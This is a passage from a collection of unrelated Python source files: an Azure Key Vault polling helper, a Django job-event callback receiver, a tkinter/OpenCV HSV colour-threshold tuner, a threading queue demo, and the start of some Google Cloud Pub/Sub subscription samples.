            if isinstance(result, GeneratorType):
                results.extend(result)
            else:
                results.append(result)

    empty_signal = object()
    threads = []
    for x in range(parallelism):
        tkwds = kwds.copy()
        tkwds.update(per_thread_kwds())
        targs = (iter_queue(kill, q, empty_signal),) + args + per_thread_args()
        threads.append(threading.Thread(target=worker, args=targs, kwargs=tkwds))
    try:
        try:
            for x in threads:
                x.start()
            # now we feed the queue.
            for data in iterable:
                q.put(data)
        except:
            # deliberately bare: even KeyboardInterrupt must flip the kill
            # switch (so workers unblock) before propagating.
            kill.set()
            raise
    finally:
        for x in range(parallelism):
            q.put(empty_signal)
        reclaim_threads(threads)
    return results
|
_polling.py | # ------------------------------------
# Copyright (c) Microsoft Corporation.
# Licensed under the MIT License.
# ------------------------------------
import logging
import time
import threading
import uuid
from typing import TYPE_CHECKING
from azure.core.polling import PollingMethod, LROPoller, NoPolling
from azure.core.exceptions import ResourceNotFoundError, HttpResponseError
try:
from urlparse import urlparse # type: ignore # pylint: disable=unused-import
except ImportError:
from urllib.parse import urlparse
from azure.core.tracing.decorator import distributed_trace
from azure.core.tracing.common import with_current_context
if TYPE_CHECKING:
# pylint: disable=ungrouped-imports
from typing import Any, Callable, Union, List, Optional
logger = logging.getLogger(__name__)
class KeyVaultOperationPoller(LROPoller):
    """Poller for long running operations where calling result() doesn't wait for operation to complete.
    """

    # pylint: disable=arguments-differ
    def __init__(self, polling_method):
        # type: (PollingMethod) -> None
        # NoPolling() satisfies the base-class constructor; the real polling
        # method is stored separately and driven explicitly by wait().
        super(KeyVaultOperationPoller, self).__init__(None, None, None, NoPolling())
        self._polling_method = polling_method

    # pylint: disable=arguments-differ
    def result(self):
        # type: () -> Any
        """Returns a representation of the final resource without waiting for the operation to complete.

        :returns: The deserialized resource of the long running operation
        :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
        """
        return self._polling_method.resource()

    @distributed_trace
    def wait(self, timeout=None):
        # type: (Optional[int]) -> None
        """Wait on the long running operation for a number of seconds.

        You can check if this call has ended with timeout with the "done()" method.

        :param int timeout: Period of time to wait for the long running
            operation to complete (in seconds).
        :raises ~azure.core.exceptions.HttpResponseError: Server problem with the query.
        """
        if not self._polling_method.finished():
            self._done = threading.Event()
            # Run the polling loop on a daemon thread so join() can time out
            # without blocking interpreter shutdown.
            self._thread = threading.Thread(
                target=with_current_context(self._start),
                name="KeyVaultOperationPoller({})".format(uuid.uuid4()))
            self._thread.daemon = True
            self._thread.start()
        # _thread stays None when the operation was already finished.
        if self._thread is None:
            return
        self._thread.join(timeout=timeout)
        try:
            # Let's handle possible None in forgiveness here
            raise self._exception  # type: ignore
        except TypeError:  # Was None
            pass
class RecoverDeletedPollingMethod(PollingMethod):
    """Polls a recover operation by retrying `command` until it stops
    raising ResourceNotFoundError (or a 403 indicates recovery finished).
    """

    def __init__(self, command, final_resource, initial_status, finished_status, interval=2):
        # command: zero-arg callable probed on each poll (e.g. get_deleted_*).
        # final_resource: value returned by resource() once polling is done.
        self._command = command
        self._resource = final_resource
        self._polling_interval = interval
        self._status = initial_status
        self._finished_status = finished_status

    def _update_status(self):
        # type: () -> None
        try:
            self._command()
            self._status = self._finished_status
        except ResourceNotFoundError:
            # Not recovered yet; keep the current status and poll again.
            pass
        except HttpResponseError as e:
            # If we are polling on get_deleted_* and we don't have get permissions, we will get
            # ResourceNotFoundError until the resource is recovered, at which point we'll get a 403.
            if e.status_code == 403:
                self._status = self._finished_status
            else:
                raise

    def initialize(self, client, initial_response, deserialization_callback):
        # No-op: this polling method is fully configured by its constructor.
        pass

    def run(self):
        # type: () -> None
        # Poll until finished; log and re-raise anything unexpected.
        try:
            while not self.finished():
                self._update_status()
                time.sleep(self._polling_interval)
        except Exception as e:
            logger.warning(str(e))
            raise

    def finished(self):
        # type: () -> bool
        return self._status == self._finished_status

    def resource(self):
        # type: () -> Any
        return self._resource

    def status(self):
        # type: () -> str
        return self._status
class DeletePollingMethod(RecoverDeletedPollingMethod):
    """Delete poller: behaves like the recover poller, but reports finished
    immediately when soft-delete is disabled (nothing to poll for then).
    """

    def __init__(self, command, final_resource, initial_status, finished_status, sd_disabled, interval=2):
        # sd_disabled: True when the vault has soft-delete turned off.
        self._sd_disabled = sd_disabled
        super(DeletePollingMethod, self).__init__(
            command=command,
            final_resource=final_resource,
            initial_status=initial_status,
            finished_status=finished_status,
            interval=interval
        )

    def finished(self):
        # type: () -> bool
        return self._sd_disabled or self._status == self._finished_status
|
run_callback_receiver.py | # Python
import logging
import os
import signal
import time
from functools import cmp_to_key
from uuid import UUID
from multiprocessing import Process
from multiprocessing import Queue as MPQueue
from queue import Empty as QueueEmpty
from queue import Full as QueueFull
from kombu import Connection, Exchange, Queue
from kombu.mixins import ConsumerMixin
# Django
from django.conf import settings
from django.core.management.base import BaseCommand
from django.db import connection as django_connection
from django.db import DatabaseError, OperationalError
from django.db.utils import InterfaceError, InternalError
from django.core.cache import cache as django_cache
# CyBorgBackup
from cyborgbackup.main.models.jobs import Job
from cyborgbackup.main.models.events import JobEvent
from cyborgbackup.main.models.catalogs import Catalog
from cyborgbackup.main.consumers import emit_channel_notification
logger = logging.getLogger('cyborgbackup.main.commands.run_callback_receiver')
class WorkerSignalHandler:
    """Flips `kill_now` when SIGINT/SIGTERM arrives, so worker loops can
    exit gracefully by polling the flag."""

    def __init__(self):
        self.kill_now = False
        for signum in (signal.SIGINT, signal.SIGTERM):
            signal.signal(signum, self.exit_gracefully)

    def exit_gracefully(self, *args, **kwargs):
        """Signal handler: request shutdown (accepts the (signum, frame) args)."""
        self.kill_now = True
class CallbackBrokerWorker(ConsumerMixin):
    """Kombu consumer that fans job-event messages out to worker processes.

    Messages from settings.CALLBACK_QUEUE are routed (sticky by job uuid
    when present) to one of four multiprocessing queues, each drained by a
    forked worker process that persists events to the database.
    """
    # Max re-attempts when the DB connection drops while saving an event.
    MAX_RETRIES = 2

    def __init__(self, connection, use_workers=True):
        self.connection = connection
        # Each entry is [messages_written, MPQueue, Process].
        self.worker_queues = []
        self.total_messages = 0
        self.init_workers(use_workers)

    def init_workers(self, use_workers=True):
        """Fork the worker processes and install shutdown signal handlers."""
        def shutdown_handler(active_workers):
            # Build a handler that terminates all workers, then re-raises
            # the signal with its default disposition.
            def _handler(signum, frame):
                try:
                    for active_worker in active_workers:
                        active_worker.terminate()
                    signal.signal(signum, signal.SIG_DFL)
                    os.kill(os.getpid(), signum)  # Rethrow signal, this time without catching it
                except Exception:
                    logger.exception('Error in shutdown_handler')
            return _handler
        if use_workers:
            # Close inherited DB/cache connections so forked children don't
            # share live descriptors with the parent.
            django_connection.close()
            django_cache.close()
            for idx in range(4):
                queue_actual = MPQueue(10000)
                w = Process(target=self.callback_worker, args=(queue_actual, idx,))
                w.start()
                if settings.DEBUG:
                    logger.info('Started worker %s' % str(idx))
                self.worker_queues.append([0, queue_actual, w])
        elif settings.DEBUG:
            logger.warn('Started callback receiver (no workers)')
        signal.signal(signal.SIGINT, shutdown_handler([p[2] for p in self.worker_queues]))
        signal.signal(signal.SIGTERM, shutdown_handler([p[2] for p in self.worker_queues]))

    def get_consumers(self, Consumer, channel):
        """ConsumerMixin hook: consume JSON messages from the callback queue."""
        return [Consumer(queues=[Queue(settings.CALLBACK_QUEUE,
                                       Exchange(settings.CALLBACK_QUEUE, type='direct'),
                                       routing_key=settings.CALLBACK_QUEUE)],
                         accept=['json'],
                         callbacks=[self.process_task])]

    def process_task(self, body, message):
        """Route one message to a worker queue and acknowledge it.

        Messages with a uuid always map to the same worker (events of one
        job stay ordered); others are spread round-robin.
        """
        if "uuid" in body and body['uuid']:
            try:
                queue = UUID(body['uuid']).int % 4
            except Exception:
                queue = self.total_messages % 4
        else:
            queue = self.total_messages % 4
        self.write_queue_worker(queue, body)
        self.total_messages += 1
        message.ack()

    def write_queue_worker(self, preferred_queue, body):
        """Put `body` on the preferred queue, falling back to the others.

        Returns the index of the queue written to, or None when every put
        timed out or failed.
        """
        # Sort so the preferred queue is tried first, others keep order.
        queue_order = sorted(range(4), key=cmp_to_key(lambda x, y: -1 if x == preferred_queue else 0))
        write_attempt_order = []
        for queue_actual in queue_order:
            try:
                worker_actual = self.worker_queues[queue_actual]
                worker_actual[1].put(body, block=True, timeout=5)
                worker_actual[0] += 1
                return queue_actual
            except QueueFull:
                pass
            except Exception:
                import traceback
                tb = traceback.format_exc()
                logger.warn("Could not write to queue %s" % preferred_queue)
                logger.warn("Detail: {}".format(tb))
            write_attempt_order.append(preferred_queue)
        logger.warn("Could not write payload to any queue, attempted order: {}".format(write_attempt_order))
        return None

    def callback_worker(self, queue_actual, idx):
        """Worker-process loop: drain `queue_actual`, persisting each event.

        Runs until SIGINT/SIGTERM flips the WorkerSignalHandler flag.
        """
        signal_handler = WorkerSignalHandler()
        while not signal_handler.kill_now:
            try:
                body = queue_actual.get(block=True, timeout=1)
            except QueueEmpty:
                continue
            except Exception as e:
                logger.error("Exception on worker thread, restarting: " + str(e))
                continue
            try:
                # Discriminating payload key -> model that persists it.
                event_map = {
                    'job_id': JobEvent,
                    'catalog': Catalog,
                }
                if not any([key in body for key in event_map]):
                    raise Exception('Payload does not have a job identifier')
                if settings.DEBUG:
                    from pygments import highlight
                    from pygments.lexers import PythonLexer
                    from pygments.formatters import Terminal256Formatter
                    from pprint import pformat
                    logger.info('Body: {}'.format(
                        highlight(pformat(body, width=160), PythonLexer(), Terminal256Formatter(style='friendly'))
                    )[:1024 * 4])

                def _save_event_data():
                    # Persist through every model whose key is present.
                    for key, cls in event_map.items():
                        if key in body:
                            cls.create_from_data(**body)
                job_identifier = 'unknown job'
                for key in event_map.keys():
                    if key in body:
                        job_identifier = body[key]
                        break
                if body.get('event') == 'EOF':
                    try:
                        msg = 'Event processing is finished for Job {}, sending notifications'
                        logger.info(msg.format(job_identifier))
                        # EOF events are sent when stdout for the running task is
                        # closed. don't actually persist them to the database; we
                        # just use them to report `summary` websocket events as an
                        # approximation for when a job is "done"
                        emit_channel_notification(
                            'jobs-summary',
                            dict(group_name='jobs', job_id=job_identifier)
                        )
                        # Additionally, when we've processed all events, we should
                        # have all the data we need to send out success/failure
                        # notification templates
                        j = Job.objects.get(pk=job_identifier)
                        if hasattr(j, 'send_notification_templates'):
                            retries = 0
                            while retries < 5:
                                if j.finished:
                                    state = 'succeeded' if j.status == 'successful' else 'failed'
                                    j.send_notification_templates(state)
                                    break
                                else:
                                    # wait a few seconds to avoid a race where the
                                    # events are persisted _before_ the UJ.status
                                    # changes from running -> successful
                                    retries += 1
                                    time.sleep(1)
                                    j = Job.objects.get(pk=job_identifier)
                    except Exception:
                        logger.exception('Worker failed to emit notifications: Job {}'.format(job_identifier))
                    continue
                retries = 0
                while retries <= self.MAX_RETRIES:
                    try:
                        _save_event_data()
                        break
                    except (OperationalError, InterfaceError, InternalError):
                        if retries >= self.MAX_RETRIES:
                            msg = 'Worker could not re-establish database connection, shutting down gracefully: Job {}'
                            logger.exception(msg.format(job_identifier))
                            os.kill(os.getppid(), signal.SIGINT)
                            return
                        # Linear backoff before reconnecting.
                        delay = 60 * retries
                        logger.exception('Database Error Saving Job Event, retry #{i} in {delay} seconds:'.format(
                            i=retries + 1,
                            delay=delay
                        ))
                        django_connection.close()
                        time.sleep(delay)
                        retries += 1
                    except DatabaseError:
                        logger.exception('Database Error Saving Job Event for Job {}'.format(job_identifier))
                        break
            except Exception as exc:
                import traceback
                tb = traceback.format_exc()
                logger.error('Callback Task Processor Raised Exception: %r', exc)
                logger.error('Detail: {}'.format(tb))
class Command(BaseCommand):
    '''
    Save Job Callback receiver (see cyborgbackup.plugins.callbacks.job_event_callback)
    Runs as a management command and receives job save events. It then hands
    them off to worker processors (see Worker) which writes them to the database
    '''
    help = 'Launch the job callback receiver'

    def handle(self, *arg, **options):
        # Consume from the broker until interrupted with Ctrl-C.
        with Connection(settings.BROKER_URL) as conn:
            try:
                worker = CallbackBrokerWorker(conn)
                worker.run()
            except KeyboardInterrupt:
                print('Terminating Callback Receiver')
|
sourcecode.py | import tkinter as tk
from PIL import Image
from PIL import ImageTk
from tkinter import filedialog
import time,cv2
import numpy as np
from subprocess import check_output
import pyautogui
from threading import Thread, Lock
# NOTE(review): presumably a run-once guard flag; its use is not visible in
# this portion of the file -- confirm against the rest of the script.
once = True
# Most recently captured screenshot image; None until one is taken.
img_screenshot = None
# Side effect at import time: opens the default webcam (device index 0).
cam = cv2.VideoCapture(0)
class App:
    """Interactive HSV threshold tuner.

    Displays a webcam frame (or a captured screen region) next to the binary
    mask produced by ``cv2.inRange``, with sliders for the low/high Hue,
    Saturation and Value bounds.  Relies on module-level globals ``once``,
    ``img_screenshot``, ``cam`` and ``root``.
    """
    # Current source image; reassigned through several representations
    # (numpy BGR -> RGB -> PIL Image -> ImageTk.PhotoImage) in show_changes().
    original_image = None
    # HSV-converted numpy copy of the source image, used for masking.
    hsv_image = None
    # switch to make sure screenshot not taken while already pressed
    taking_screenshot = False
    def __init__(self, master):
        """Build the slider/button/image-label layout on *master*."""
        self.img_path = None
        frame = tk.Frame(master)
        frame.grid()
        root.title("Sliders")
        self.hue_lbl = tk.Label(text="Hue", fg='red')
        self.hue_lbl.grid(row=2)
        # Hue range in OpenCV is 0-179 (not 0-255).
        self.low_hue = tk.Scale(master, label='Low',from_=0, to=179, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
        self.low_hue.grid(row=3)
        self.high_hue = tk.Scale(master,label='High', from_=0, to=179, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
        self.high_hue.set(179)
        self.high_hue.grid(row=4)
        ###########################################################################################################
        self.sat_lbl = tk.Label(text="Saturation", fg='green')
        self.sat_lbl.grid(row=5)
        self.low_sat = tk.Scale(master, label='Low',from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
        self.low_sat.set(100)
        self.low_sat.grid(row=6)
        self.high_sat = tk.Scale(master, label="High", from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
        self.high_sat.set(255)
        self.high_sat.grid(row=7)
        ###########################################################################################################
        self.val_lbl = tk.Label(text="Value", fg='Blue')
        self.val_lbl.grid(row=8)
        self.low_val = tk.Scale(master, label="Low",from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
        self.low_val.set(100)
        self.low_val.grid(row=9)
        self.high_val = tk.Scale(master, label="High",from_=0, to=255, length=500,orient=tk.HORIZONTAL, command=self.show_changes)
        self.high_val.set(255)
        self.high_val.grid(row=10)
        ###########################################################################################################
        # buttons
        #self.reset_btn = tk.Button(text='Reset', command=self.reset_values)
        #self.reset_btn.grid(row=1,column=1)
        self.print_btn = tk.Button(text='Print', command=self.print_values)
        self.print_btn.grid(row=2, column=1)
        # NOTE(review): self.reds is rebound for each preset button below; the
        # earlier Button widgets stay alive only through the grid geometry manager.
        self.reds = tk.Button(text="Reds", fg='red', command=self.preset_r)
        self.reds.grid(row=3, column=1)
        self.reds = tk.Button(text="Greens", fg='green', command=self.preset_g)
        self.reds.grid(row=4, column=1)
        self.reds = tk.Button(text="Blues", fg='blue', command=self.preset_b)
        self.reds.grid(row=5, column=1)
        # Open
        self.open_btn = tk.Button(text="Open", command=self.open_file)
        self.open_btn.grid(row=6, column=1)
        # Screenshot
        self.screenshot_btn = tk.Button(text="Screenshot", command=self.screenshot_standby)
        self.screenshot_btn.grid(row=7, column=1)
        # print mask array
        #self.print_mask_array_btn = tk.Button(text="Print Array", command=self.print_img_array)
        #self.print_mask_array_btn.grid(row=9, column=1)
        ###########################################################################################################
        # timer label
        self.screenshot_timer_lbl = tk.Label(text="Timer", fg='Red')
        self.screenshot_timer_lbl.grid(row=8, column=1)
        ########################################################################################################## Images
        # images
        self.hsv_img_lbl = tk.Label(text="HSV", image=None)
        self.hsv_img_lbl.grid(row=0, column=0)
        self.original_img_lbl = tk.Label(text='Original',image=None)
        self.original_img_lbl.grid(row=0, column=1)
        ##########################################################################################################
    def open_file(self):
        """(Re)load the source image; currently hard-wired to 'input.jpg'."""
        global once
        once = True
        # NOTE(review): file chooser is disabled; img_file is hard-coded, so the
        # empty-string check below can never trigger.
        #img_file = filedialog.askopenfilename()
        img_file = "input.jpg"
        print(img_file)
        # this makes sure you select a file
        # otherwise program crashes if not
        if img_file != '':
            self.img_path = img_file
            # this just makes sure the image shows up after opening it
            # (a tiny slider wiggle fires the show_changes callback)
            self.low_hue.set(self.low_hue.get()+1)
            self.low_hue.set(self.low_hue.get()-1)
        else:
            print('picked nothing')
            return 0
    def preset_r(self, *args):
        """Set the sliders to an HSV range that isolates reds."""
        self.low_hue.set(0)
        self.high_hue.set(13)
        self.low_sat.set(100)
        self.high_sat.set(255)
        self.low_val.set(50)
        self.high_val.set(255)
    def preset_g(self, *args):
        """Set the sliders to an HSV range that isolates greens."""
        self.low_hue.set(36)
        self.high_hue.set(90)
        self.low_sat.set(100)
        self.high_sat.set(255)
        self.low_val.set(50)
        self.high_val.set(255)
    def preset_b(self, *args):
        """Set the sliders to an HSV range that isolates blues."""
        self.low_hue.set(80)
        self.high_hue.set(125)
        self.low_sat.set(100)
        self.high_sat.set(255)
        self.low_val.set(75)
        self.high_val.set(255)
    def show_changes(self, *args):
        """Slider callback: refresh the source image and rebuild the mask preview."""
        global once, img_screenshot
        if self.img_path == None:
            return 0
        # gets the values from the sliders
        # low blue, green, red
        low_hue = self.low_hue.get()
        low_sat = self.low_sat.get()
        low_val = self.low_val.get()
        # gets upper values from sliders
        high_hue = self.high_hue.get()
        high_sat = self.high_sat.get()
        high_val = self.high_val.get()
        # does nothing if low values go higher than high values
        if low_val > high_val or low_sat > high_sat or low_hue > high_hue:
            return 0
        # Sets the original image once, manipulates the copy in next iterations
        if once:
            # gets image from file
            if self.img_path != 'screenshot':
                #img_path = 'objects.png'
                # loaded as BGR
                s, im = cam.read()
                self.original_image = im
                # image resized
                self.original_image = self.resize_image(self.original_image)
                self.hsv_image = self.original_image.copy()
                #converts image to HSV
                self.hsv_image = cv2.cvtColor(self.hsv_image, cv2.COLOR_BGR2HSV)
            # gets screenshot
            else:
                self.original_image = img_screenshot
                self.hsv_image = img_screenshot.copy()
                #converts image to HSV
                self.hsv_image = cv2.cvtColor(self.hsv_image, cv2.COLOR_BGR2HSV)
            # OpenCV represents images in BGR order; however PIL represents
            # images in RGB order, so we need to swap the channels
            self.original_image = cv2.cvtColor(self.original_image, cv2.COLOR_BGR2RGB)
            # convert the images to PIL format
            self.original_image = Image.fromarray(self.original_image)
            # convert to ImageTk format
            self.original_image = ImageTk.PhotoImage(self.original_image)
            # update the original image label
            self.original_img_lbl.configure(image=self.original_image)
            # Keeping a reference! b/ need to!
            self.original_img_lbl.image = self.original_image
            # NOTE(review): 'once' is set back to True here, so this branch
            # re-reads the camera on every slider event (a live feed) rather
            # than caching the first frame — confirm that is intended.
            once = True
        # sets the lower and upper values for the mask
        # define range of colors in HSV (hue up to 179, sat-255, value-255
        lower_color = np.array([low_hue,low_sat,low_val])
        upper_color= np.array([high_hue,high_sat,high_val])
        # red - 0,255,255 (low (hue-10,100,100) high(hue+10,255,255)
        # green 60,255,255
        # blue -120,255,255
        #creates the mask and result
        mask = cv2.inRange(self.hsv_image, lower_color, upper_color)
        #res = cv2.bitwise_and(img, img, mask=mask)
        # converting to RGB format
        #maskbgr = cv2.cvtColor(mask, cv2.COLOR_HSV2BGR)
        #maskrgb = cv2.cvtColor(maskbgr, cv2.COLOR_BGR2RGB)
        # converting to PIL format
        mask = Image.fromarray(mask)
        # converting to ImageTk format
        mask = ImageTk.PhotoImage(mask)
        # setting the hsv image to tk image label
        self.hsv_img_lbl.configure(image=mask)
        # adding a reference to the image to Prevent python's garbage collection from deleting it
        self.hsv_img_lbl.image = mask
    def reset_values(self,*args):
        """Restore all six sliders to their startup defaults."""
        self.low_hue.set(0)
        self.low_sat.set(100)
        self.low_val.set(100)
        self.high_hue.set(179)
        self.high_sat.set(255)
        self.high_val.set(255)
    def print_values(self,*args):
        """Does NOT actually save, just prints, for now"""
        print("Low = [{},{},{}]".format(self.low_hue.get(), self.low_sat.get(), self.low_val.get()))
        print("High= [{},{},{}]".format(self.high_hue.get(), self.high_sat.get(), self.high_val.get()))
    def screenshot_standby(self,*args):
        """Start take_screenshot() on a worker thread unless one is running."""
        if not self.taking_screenshot:
            take_screenshot_thread = Thread(target=self.take_screenshot)
            take_screenshot_thread.start()
        else:
            return 0
    def take_screenshot(self,*args):
        """Grab a screen region whose corners are the mouse position sampled
        3 seconds apart, store it in the module-global img_screenshot, and
        refresh the preview.  Returns the raw capture if called with 'array'."""
        global img_screenshot, once
        # switch to stop screenshot button from snaping a shot while snapping a shot
        self.taking_screenshot = True
        # switch to always display the screenshot as original everytime
        once = True
        # makes sure method 'show_changes' takes screenshot instead of img file
        self.img_path = 'screenshot'
        # starts a count down timer of 3 seconds, parallel to the for loop
        screenshot_timer_thread = Thread(target=self.screenshot_timer_lbl_update)
        screenshot_timer_thread.start()
        for i in range(2):
            # wait 3 seconds before sampling each corner
            for _ in range(3):
                time.sleep(1)
            try:
                # sets the first point of screenshot
                if i == 0:
                    x1,y1 = pyautogui.position()
                # sets the second point of screenshot
                else:
                    x2,y2 = pyautogui.position()
            except Exception as e:
                print("ERROR: {}".format(e))
                print("{}{} {}{}\n".format(x1,y1,x2,y2))
                continue
        # exits if width and height are not greater than 0
        if x2 - x1 < 1 or y2 - y1 < 1:
            print("Retake Screenshot")
            print("Width={} Height={}".format(x2 - x1, y2 - y1))
            return
        # screenshot taken here with the grabbed coordinates
        try:
            # top-leftpt, w & h
            screenshoted_image = pyautogui.screenshot(region=(x1,y1,x2-x1,y2-y1))
            screenshoted_image = np.array(screenshoted_image)
        except Exception as e:
            print(e)
            print("Could not capture image")
            print("...coords passed pt1({},{}) pt2({},{})".format(x1,y1,x2,y2))
            return
        # converts the PIL image format to opencv2 image format
        img_screenshot = cv2.cvtColor(screenshoted_image, cv2.COLOR_RGB2BGR)
        # printing image array, by taking another screenshot and processing, effects will now show
        # NOTE(review): bare except below swallows the IndexError raised when
        # this method is called without arguments (the normal thread path).
        try:
            if args[0] == 'array':
                self.taking_screenshot = False
                return img_screenshot
        except:
            pass
        # resizes image if higher than 300px in width or height
        img_screenshot = self.resize_image(img_screenshot)
        # this just makes sure the image shows up after opening it
        self.low_hue.set(self.low_hue.get()+1)
        self.low_hue.set(self.low_hue.get()-1)
        # switch to allow for next screenshot
        self.taking_screenshot = False
    def screenshot_timer_lbl_update(self,*args):
        """Drive the 1..3 countdown label twice, in step with take_screenshot()."""
        for _ in range(2):
            for i in range(3):
                self.screenshot_timer_lbl.config(text="{}".format(i+1))
                time.sleep(1)
        self.screenshot_timer_lbl.config(text="{}".format(" "))
    def resize_image(self,img,*args):
        """Halve the image until both sides are <= 500 px; if that leaves it
        under 300x300, double it once.  Returns the resized image."""
        # unpacks width, height
        height, width,_ = img.shape
        print("Original size: {} {}".format(width, height))
        count_times_resized = 0
        while width > 500 or height > 500:
            #if width > 300 or height > 300:
            # divides images WxH by half
            width = width / 2
            height = height /2
            count_times_resized += 1
        # prints x times resized to console
        if count_times_resized != 0:
            print("Resized {}x smaller, to: {} {}".format(count_times_resized*2,width, height))
        # makes sures image is not TOO small
        if width < 300 and height < 300:
            width = width * 2
            height = height * 2
        img = cv2.resize(img,(int(width),int(height)))
        return img
    def print_img_array(self):
        """Capture a fresh screenshot and build a mask from the current sliders."""
        img = self.take_screenshot('array')
        #converts image to HSV
        img = cv2.cvtColor(img, cv2.COLOR_BGR2HSV)
        # gets the values from the sliders
        low_hue = self.low_hue.get()
        low_sat = self.low_sat.get()
        low_val = self.low_val.get()
        # gets upper values from sliders
        high_hue = self.high_hue.get()
        high_sat = self.high_sat.get()
        high_val = self.high_val.get()
        lower_color = np.array([low_hue,low_sat,low_val])
        upper_color= np.array([high_hue,high_sat,high_val])
        #creates the mask and result
        mask = cv2.inRange(self.hsv_image, lower_color, upper_color)
        mask = np.array(mask)
        # NOTE(review): 'mask.view' is an attribute access, not a call — this
        # line has no effect; probably meant mask.view() or print(mask). Confirm.
        mask.view
# Instance of Tkinter (the root window that owns all widgets)
root = tk.Tk()
# New tkinter instance of the app (builds sliders, buttons and image labels)
app = App(root)
# loops over to keep window active until the user closes it
root.mainloop()
|
synchronizer.py | import multiprocessing.dummy as multiprocessing
from time import sleep
import queue
import uuid
import random
input = multiprocessing.Queue()
stop_event = multiprocessing.Event()
stored_data = []
uuid_to_index = {}
def generate_data(id):
    """Producer: push (id, counter) tuples onto the shared queue until
    the module-level stop_event is set."""
    counter = 1
    # Check the stop flag once per item so shutdown is prompt.
    while not stop_event.is_set():
        input.put((id, counter))
        counter += 1
def persist_data(stored_data, uuid_to_index):
    """Consumer: drain the shared queue into stored_data, tagging each
    record with a uuid and indexing it; stop after 1s of silence."""
    while True:
        try:
            item = input.get(True, 1)
        except queue.Empty:
            # No producer activity for a full second -> assume we are done.
            return
        key = uuid.uuid4().hex
        uuid_to_index[key] = len(stored_data)
        stored_data.append(item + (key,))
def main():
    """Run eight producer threads for ~4 seconds, persist their output,
    then look one random record up both by index and by uuid."""
    persister = multiprocessing.Process(target=persist_data, args=(stored_data, uuid_to_index))
    persister.start()
    # Spin up one producer per worker id.
    generators = []
    for worker_id in range(8):
        proc = multiprocessing.Process(target=generate_data, args=(worker_id,))
        proc.start()
        generators.append(proc)
    sleep(4)
    stop_event.set()
    persister.join()
    print('time to find data out of {} entries'.format(len(stored_data)))
    idx = random.randrange(len(stored_data))
    print('finding index {}: {}'.format(idx, stored_data[idx]))
    # Round-trip: fetch the same record again via its uuid (element [2]).
    print(stored_data[uuid_to_index[stored_data[idx][2]]])
    print('done')
# Run the demo only when executed as a script, not on import.
if __name__ == '__main__':
    main()
|
subscriber.py | #!/usr/bin/env python
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This application demonstrates how to perform basic operations on
subscriptions with the Cloud Pub/Sub API.
For more information, see the README.md under /pubsub and the documentation
at https://cloud.google.com/pubsub/docs.
"""
import argparse
def list_subscriptions_in_topic(project_id, topic_id):
    """Lists all subscriptions for a given topic."""
    # [START pubsub_list_topic_subscriptions]
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # topic_id = "your-topic-id"
    # Subscriptions attached to a topic are listed via the *publisher* client.
    client = pubsub_v1.PublisherClient()
    path = client.topic_path(project_id, topic_id)
    for subscription in client.list_topic_subscriptions(path):
        print(subscription)
    # [END pubsub_list_topic_subscriptions]
def list_subscriptions_in_project(project_id: str) -> None:
    """Lists all subscriptions in the current project."""
    # [START pubsub_list_subscriptions]
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    subscriber = pubsub_v1.SubscriberClient()
    project_path = subscriber.project_path(project_id)
    # Wrap the subscriber in a 'with' block to automatically call close() to
    # close the underlying gRPC channel when done.
    with subscriber:
        for subscription in subscriber.list_subscriptions(project_path):
            print(subscription.name)
    # [END pubsub_list_subscriptions]
def create_subscription(project_id: str, topic_id: str, subscription_id: str) -> None:
    """Create a new pull subscription on the given topic."""
    # [START pubsub_create_pull_subscription]
    from google.cloud import pubsub_v1
    # TODO(developer)
    # project_id = "your-project-id"
    # topic_id = "your-topic-id"
    # subscription_id = "your-subscription-id"
    subscriber = pubsub_v1.SubscriberClient()
    topic_path = subscriber.topic_path(project_id, topic_id)
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    # Wrap the subscriber in a 'with' block to automatically call close() to
    # close the underlying gRPC channel when done.
    with subscriber:
        subscription = subscriber.create_subscription(subscription_path, topic_path)
        print("Subscription created: {}".format(subscription))
    # [END pubsub_create_pull_subscription]
def create_subscription_with_dead_letter_topic(
    project_id: str, topic_id: str, subscription_id: str, dead_letter_topic_id: str
) -> None:
    """Create a subscription with dead letter policy."""
    # [START pubsub_dead_letter_create_subscription]
    from google.cloud import pubsub_v1
    from google.cloud.pubsub_v1.types import DeadLetterPolicy
    # TODO(developer)
    # project_id = "your-project-id"
    # endpoint = "https://my-test-project.appspot.com/push"
    # TODO(developer): This is an existing topic that the subscription
    # with dead letter policy is attached to.
    # topic_id = "your-topic-id"
    # TODO(developer): This is an existing subscription with a dead letter policy.
    # subscription_id = "your-subscription-id"
    # TODO(developer): This is an existing dead letter topic that the subscription
    # with dead letter policy will forward dead letter messages to.
    # dead_letter_topic_id = "your-dead-letter-topic-id"
    subscriber = pubsub_v1.SubscriberClient()
    topic_path = subscriber.topic_path(project_id, topic_id)
    subscription_path = subscriber.subscription_path(project_id, subscription_id)
    dead_letter_topic_path = subscriber.topic_path(project_id, dead_letter_topic_id)
    # Messages that fail delivery 10 times are forwarded to the dead letter topic.
    dead_letter_policy = DeadLetterPolicy(
        dead_letter_topic=dead_letter_topic_path, max_delivery_attempts=10
    )
    with subscriber:
        subscription = subscriber.create_subscription(
            subscription_path, topic_path, dead_letter_policy=dead_letter_policy
        )
        print("Subscription created: {}".format(subscription.name))
        print(
            "It will forward dead letter messages to: {}".format(
                subscription.dead_letter_policy.dead_letter_topic
            )
        )
        print(
            "After {} delivery attempts.".format(
                subscription.dead_letter_policy.max_delivery_attempts
            )
        )
    # [END pubsub_dead_letter_create_subscription]
def create_push_subscription(project_id: str, topic_id: str, subscription_id: str, endpoint: str) -> None:
    """Create a new push subscription on the given topic."""
    # [START pubsub_create_push_subscription]
    from google.cloud import pubsub_v1
